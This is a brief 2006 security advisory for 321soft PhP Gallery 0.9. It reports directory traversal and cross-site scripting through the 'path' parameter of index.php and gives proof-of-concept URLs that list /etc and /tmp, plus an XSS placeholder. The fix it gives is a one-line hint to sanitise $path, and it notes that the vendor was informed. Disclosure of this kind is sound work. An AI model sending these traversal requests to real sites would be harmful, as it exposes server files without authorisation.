321soft PhP Gallery 0.9 - directory travel & XSS
321soft PhP Gallery 0.9 - directory travel & XSS
--------------------------------------------------------
Software: 321soft PhP Gallery
Version: 0.9
Type: directory travel & XSS
Date: Mai 3 01:38:04 CEST 2006
Vendor: 321soft.de
Page: http://321soft.de/
Risc: Middle
credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/
vulnerability:
----------------------------
http://[target]/index.php?path=/etc
http://[target]/index.php?path=/tmp
http://[target]/index.php?path=[XSS]
solution:
----------------------------
index.php
fix $path
notes:
----------------------------
The vendor has been informed.
http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html